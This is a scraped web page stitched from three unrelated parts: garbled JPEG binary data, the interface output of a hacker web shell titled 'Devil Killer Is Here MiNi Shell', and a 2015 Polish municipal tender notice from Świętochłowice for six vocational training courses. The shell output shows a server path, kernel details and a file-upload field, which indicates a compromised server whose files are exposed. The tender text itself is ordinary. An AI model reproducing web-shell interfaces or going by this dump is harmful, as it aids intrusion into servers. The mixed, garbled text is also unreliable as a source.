JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150108/1979-N-2015.html

<p class="kh_header"><b>Świętochłowice: Usługa przeprowadzenia kursów dla uczestników projektu 
Mam zawód - mam pracę w regionie z terenu Miasta Świętochłowice.</b><br>
<b>Numer ogłoszenia: 1979 - 2015; data zamieszczenia: 08.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świętochłowice reprezentowana przez Prezydenta Miasta Świętochłowice , ul. Katowicka 54, 41-600 Świętochłowice, woj. śląskie, tel. 32 3491 800, faks 32 349 18 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swietochlowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa przeprowadzenia kursów dla uczestników projektu 
Mam zawód - mam pracę w regionie z terenu Miasta Świętochłowice..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi przeprowadzenia kursów zawodowych dla uczestników projektu Mam zawód - mam pracę w regionie z terenu Miasta Świętochłowice.
2.	Ogólne obowiązki Wykonawcy dotyczące wszystkich kursów:
1)	Wykonawca przeprowadzi kursy na terenie miasta Świętochłowice. W przypadku gdy Wykonawca zrealizuje kurs poza terenem miasta Świętochłowice, zobowiązany jest do zorganizowania na własny koszt codziennego transportu dla każdego uczestnika na trasie: Świętochłowice - miejsce kursu - Świętochłowice. Wykonawca zobowiązany jest uwzględnić ww. koszt transportu uczestników w cenie oferty.
2)	Wykonawca zrealizuje zajęcia w warunkach pozwalających odbycie kursu. W przypadku gdy charakter kursu wymaga aby zajęcia odbywały się w pomieszczeniach Wykonawca zobowiązany jest zapewnić pomieszczenia z odpowiednim oświetleniem, ogrzewaniem i wentylacją, dostosowanych do prowadzenia zajęć szkoleniowych, z zapewnionym zapleczem, posiadających odpowiednie warunki sanitarne, bezpieczeństwa i higieny pracy, akustyczne i jakościowe, których powierzchnia, ilość stanowisk oraz wyposażenie w sprzęt i pomoce dydaktyczne dostosowana jest do zakresu szkolenia oraz liczby uczestników szkolenia.
3)	Wykonawca zapewni w trakcie trwania szkolenia warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy oraz -jeżeli to konieczne - odzież ochronną i sprzęt ochronny. 
4)	Kursy zostaną zakończone egzaminami wewnętrznymi. Po zaliczeniu egzaminu uczeń otrzyma od Wykonawcy dyplom/zaświadczenie ukończenia kursu, zawierające dane uczestnika kursu oraz szczegółową tematykę kursu wraz z liczbą godzin przypadającą na poszczególne tematy.
5)	W przypadku gdy do wykonywania zawodu po ukończonym kursie konieczne jest uzyskanie odpowiednich uprawnień Wykonawca zobowiązany jest do poniesienia kosztów egzaminu państwowego jedynie podczas pierwszego podejścia do egzaminu. W przypadku uzyskania negatywnego wyniku egzaminu w pierwszym terminie, kolejne podejście do egzaminu opłaca sam zdający.
6)	Wykonawca w pierwszym dniu, przed rozpoczęciem kursu, jest zobowiązany zapoznać uczestników z jego szczegółowym programem oraz przekazać im harmonogram realizowanych zajęć. 
7)	Wykonawca zapewni każdemu uczestnikowi kursu pełny komplet materiałów szkoleniowych na zajęcia praktyczne i teoretyczne
8)	Wykonawca zapewni sprzęt, materiały i produkty niezbędne do realizacji części teoretycznej i praktycznej poszczególnych kursów. 
9)	Wykonawca uwzględni w cenie także pozostałe koszty organizacyjne inne niż wymagane powyżej.
10)	Wykonawca zobowiązuje się do prowadzenia następującej dokumentacji przebiegu kursu: 
a)	dziennik zajęć edukacyjnych zawierający wymiar godzin i tematy zajęć edukacyjnych,
b)	listę obecności,
c)	protokół z przebiegu egzaminu wewnętrznego,
d)	imienny wykaz osób, które ukończyły kurs, nie ukończyły kursu, zdały egzamin, nie zdały egzaminu,
e)	rejestr wydanych zaświadczeń/certyfikatów potwierdzających ukończenie kursu i uzyskanie kwalifikacji,
f)	wypełnione ankiety ewaluacyjne,
g)	zdjęcia na nośniku CD.   
11)	Wykonawca zapewni nadzór wewnętrzny i w tym celu wskaże w miejscu szkolenia osobę odpowiedzialną za obsługę szkolenia i kontaktu z uczestnikami szkolenia oraz Zamawiającym.
12)	Wydane certyfikaty oraz zaświadczenia muszą zawierać logotypy zgodnie z aktualnymi wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Wykonawca przekaże Zamawiającemu kserokopie wydanych dokumentów wraz 
z potwierdzeniem ich zgodności z oryginałem.  
13)	Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia uczestników projektu, na każdym jego etapie wraz z udziałem w ocenach częściowych i ocenie końcowej uczestników kursu oraz kontroli frekwencji kierowanych przez Zamawiającego uczestników kursu na zajęciach. 
14)	Wszystkie dokumenty dotyczące realizacji kursu będą zawierały informację o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
15)	Wykonawca zobowiązuje się do przedstawienia harmonogramu kursu do akceptacji Zamawiającego w terminie do 7 dni po podpisaniu umowy z uwzględnieniem proponowanych przez Zamawiającego terminów prowadzenia zajęć, dostarczonych Wykonawcy w terminie do 2 dni po podpisaniu umowy. 
16)	Wykonawca zobowiązuje się do dostarczenia Zamawiającemu programu kursu w terminie 5 dni przed datą rozpoczęcia danego kursu, uwzględniającego tematykę zajęć wymaganą przez Zamawiającego dla poszczególnych kursów.
17)	Wykonawca musi posiadać zgodne z przepisami uprawnienia do realizacji kursów umożliwiające jego absolwentom przystąpienie do egzaminu kwalifikacyjnego.

Przedmiot zamówienia został podzielony na 6 części:

Część I - Kurs prawa jazdy kat. B 
Przedmiotem zamówienia jest przeprowadzenia kursu prawa jazdy kat. B.
Program kursu powinien obejmować:
-Przepisy ruchu drogowego,
-Technikę kierowania pojazdem,
-Zarys budowy pojazdu i zasady obsługi technicznej,
-Zachowanie na miejscu wypadku i pomoc przedlekarska,
-Specjalistyczne badanie lekarskie (koszt pokrywa Wykonawca),
-Naukę jazdy.
Czas trwania kursu: 30 godz. teorii oraz 30 godz. praktyki.
Wykonawca zobowiązany jest ubezpieczyć uczestnika kursu od następstw nieszczęśliwych wypadków (NNW) powstałych w związku z uczestnictwem w kursie.
Kurs będzie kończyć się egzaminem. 
Koszt przeprowadzenia i opłacenia egzaminu państwowego (jedynie w pierwszym terminie) zarówno z teorii jak i praktyki pokrywa Wykonawca. W przypadku uzyskania negatywnego wyniku egzaminu w pierwszym terminie, kolejne podejście do egzaminu opłaca sam zdający. 
Maksymalna ilość uczestników kursu: 21 osób. 
Zamawiający zastrzega możliwość zmiany ilości uczestników kursu.

Część II - Kurs magazyniera z obsługą wózka widłowego 
Przedmiotem zamówienia jest przeprowadzenia kursu magazyniera z obsługą wózka widłowego.
Program kursu powinien obejmować:
1.	Nabycie umiejętności zawodowych z zakresu technologii pracy w magazynie,
2.	Zasady załadunku i rozładunku kontenerów w magazynie,
3.	Budowa oraz obsługa wózka jezdniowego,
4.	Bezpieczna wymiana butli gazowych w wózkach wyposażonych w te urządzenia.
5.	Specjalistyczne badanie lekarskie (koszt pokrywa Wykonawca)
Czas trwania kursu: minimum 80 godzin lekcyjnych (1 godzina lekcyjna - 45 minut).
Wykonawca zobowiązany jest ubezpieczyć uczestnika kursu od następstw nieszczęśliwych wypadków (NNW) powstałych w związku z uczestnictwem w kursie.
Kurs będzie kończyć się egzaminem. 
Koszt przeprowadzenia i opłacenia egzaminu państwowego (jedynie w pierwszym terminie) zarówno z teorii jak i praktyki pokrywa Wykonawca. W przypadku uzyskania negatywnego wyniku egzaminu w pierwszym terminie, kolejne podejście do egzaminu opłaca sam zdający. 
Maksymalna ilość uczestników kursu: 4.
Zamawiający zastrzega możliwość zmiany ilości uczestników kursu.	

Część III - Kurs manicure - pedicure 
Przedmiotem zamówienia jest przeprowadzenia kursu manicure - pedicure.
Program kursu powinien obejmować:
-Zapoznanie z anatomią stopy i dłoni oraz dermatologicznymi schorzeniami dłoni, stóp i paznokci,
-Zapoznanie z zasadami manicuru i pedicuru kosmetycznego, biologicznego i leczniczego,
-Zapoznanie z metodami przedłużania paznokci, a także ich zdobnictwem.
Czas trwania kursu: 60 godzin lekcyjnych (1 godzina lekcyjna = 45 minut).
Wykonawca zobowiązany jest ubezpieczyć uczestnika kursu od następstw nieszczęśliwych wypadków (NNW) powstałych w związku z uczestnictwem w kursie.
Kurs będzie kończyć się egzaminem. 
Koszt przeprowadzenia i opłacenia egzaminu (jedynie w pierwszym terminie) pokrywa Wykonawca. W przypadku uzyskania negatywnego wyniku egzaminu w pierwszym terminie, kolejne podejście do egzaminu opłaca sam zdający. 
Maksymalna ilość uczestników kursu: 4 (w tym 1 uczestnik w wieku 17 lat).
Zamawiający zastrzega możliwość zmiany ilości uczestników kursu.

	

Część IV - Kurs obsługi kas fiskalnych i fakturowania
Przedmiotem zamówienia jest przeprowadzenie kursu obsługi kas fiskalnych i fakturowania.
Program kursu powinien obejmować:
1.	Przepisy prawne związane z zawodem sprzedawcy,
2.	Elementy towaroznawstwa handlowego,
3.	Dokumentację handlowa i magazynowa,
4.	Obsługę kas fiskalnych,
5.	Wybrany komputerowy program do fakturowania.
Czas trwania kursu: 30 godzin lekcyjnych (1 godzina lekcyjna = 45 minut).
Wykonawca zobowiązany jest ubezpieczyć uczestnika kursu od następstw nieszczęśliwych wypadków (NNW) powstałych w związku z uczestnictwem w kursie.
Kurs będzie kończyć się egzaminem. 
Koszt przeprowadzenia i opłacenia egzaminu pokrywa Wykonawca.
W przypadku uzyskania negatywnego wyniku egzaminu w pierwszym terminie, każde kolejne podejście do egzaminu opłaca zdający we własnym zakresie. 
Maksymalna ilość uczestników kursu: 3 (w tym 2 uczestników w wieku 17 lat).
Zamawiający zastrzega możliwość zmiany ilości uczestników kursu.

Część V - Kurs obsługi księgowości wspomaganej komputerem 
Przedmiotem zamówienia jest przeprowadzenie kursu księgowości wspomaganej komputerowo.
Program kursu powinien obejmować:
1.	Rachunkowość i prawo podatkowe,
2.	Organizację i prowadzenie rachunkowości,
3.	Przychody i koszty,
4.	Prowadzenie księgowości na wybranym programie komputerowym.
Czas trwania kursu: 30 godzin lekcyjnych (1 godzina lekcyjna = 45 minut).
Wykonawca zobowiązany jest ubezpieczyć uczestnika kursu od następstw nieszczęśliwych wypadków (NNW) powstałych w związku z uczestnictwem w kursie.
Kurs będzie kończyć się egzaminem. 
Koszt przeprowadzenia i opłacenia egzaminu pokrywa Wykonawca.
W przypadku uzyskania negatywnego wyniku egzaminu w pierwszym terminie, każde kolejne podejście do egzaminu opłaca zdający we własnym zakresie. 
Maksymalna ilość uczestników kursu: 2 (w tym 2 uczestników w wieku 17 lat).
Zamawiający zastrzega możliwość zmiany ilości uczestników kursu.


Część VI - Kurs tworzenia stron i aplikacji internetowych 
Przedmiotem zamówienia jest przeprowadzenia kursu tworzenia stron i aplikacji internetowych 
Program kursu powinien obejmować:
1.	Języki przy definiowaniu stron: HTML, CSS
2.	Przygotowanie grafiki na potrzeby WWW,
3.	Podstawy języka PHP
Czas trwania kursu: 50 godzin lekcyjnych (1 godzina lekcyjna = 45 minut).
Wykonawca zobowiązany jest ubezpieczyć uczestnika kursu od następstw nieszczęśliwych wypadków (NNW) powstałych w związku z uczestnictwem w kursie.
Kurs będzie kończyć się egzaminem. 
Koszt przeprowadzenia i opłacenia egzaminu pokrywa Wykonawca.
W przypadku uzyskania negatywnego wyniku egzaminu w pierwszym terminie, każde kolejne podejście do egzaminu opłaca zdający we własnym zakresie. 
Maksymalna ilość uczestników kursu: 1 (w tym 1 uczestnik w wieku 17 lat).
Zamawiający zastrzega możliwość zmiany ilości uczestników kursu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.1 na Części I zamówienia, że posiada aktualny wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców na podstawie przepisów ustawy z dnia 5.01.2011 r. o kierujących pojazdami (Dz. U. nr 30, poz. 131 z późn. zm.)
1.1.2. na Części I - VI zamówienia, że w oparciu o art. 20 ustawy z 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach na rynku pracy (tekst jedn. Dz. U. z 2013 r. poz. 674 z późn. zm.) oraz Rozporządzenia Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych (Dz. U. z 2014 r. poz. 781) posiada wpis do rejestru Instytucji Szkoleniowych Wojewódzkiego Urzędu Pracy lub ewidencji szkół i placówek niepublicznych na podstawie ustawy z dnia 7.09.1991 r. o systemie oświaty (Dz. U. nr 256 poz. 2572 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy niż  3 lata to za okres prowadzenia działalności wykonał,  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, składając ofertę:
1.2.1 części I - co najmniej jedną  ( 1 )  usługę, której przedmiotem były usługi przeprowadzenia kursu prawa jazdy kat. B dla co najmniej 15 osób.
1.2.2 części II - co najmniej jedną  ( 1 )  usługę, której przedmiotem były usługi przeprowadzenia kursu magazyniera z obsługą wózka widłowego dla co najmniej 3 osób.
1.2.3 części III - co najmniej jedną  ( 1 )  usługę, której przedmiotem były usługi przeprowadzenia kursu manicure - pedicure dla co najmniej 3 osób.
1.2.4 części IV - co najmniej jedną  ( 1 )  usługę, której przedmiotem były usługi przeprowadzenia kursu obsługi kas fiskalnych i fakturowania dla co najmniej 2 osób.
1.2.5 części V - co najmniej jedną  ( 1 )  usługę, której przedmiotem były usługi przeprowadzenia kursu księgowości wspomaganej komputerowo dla co najmniej 1 osoby.
1.2.6 części VI - co najmniej jedną  ( 1 )  usługę, której przedmiotem były usługi przeprowadzenia kursu tworzenia stron i aplikacji internetowych dla co najmniej 1 osoby.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Zamawiający dokona oceny spełnienia  tego warunku udziału w postępowaniu na podstawie  oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Zamawiający dokona oceny spełnienia  tego warunku udziału w postępowaniu na podstawie  oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Zamawiający dokona oceny spełnienia  tego warunku udziału w postępowaniu na podstawie  oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenia oraz dokumenty wskazane  w rozdziale 6 specyfikacji, 
2. wypełniony i podpisany  formularz ofertowy  (treść formularza zamieszczona w załączniku nr 2),
3. oświadczenie o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom lub podania przez wykonawcę nazw ( firm) podwykonawców,  na których zasoby wykonawca się powołuje na zasadach określonych w art. 26 ust. 2b ustawy  w celu wykazania spełniania warunku udziału w postępowaniu , o których mowa w art. 22 ust. 1 ustawy  ( w treści formularza ofertowego pkt 3)
4. pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarciu umowy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy (dotyczy również wspólników spółki cywilnej),
5. pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania Wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub Wykonawca  w przypadku osób fizycznych,
6. informację o  przynależności do grupy kapitałowej składanej w trybie art.26 ust.2d ustawy, w przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy:
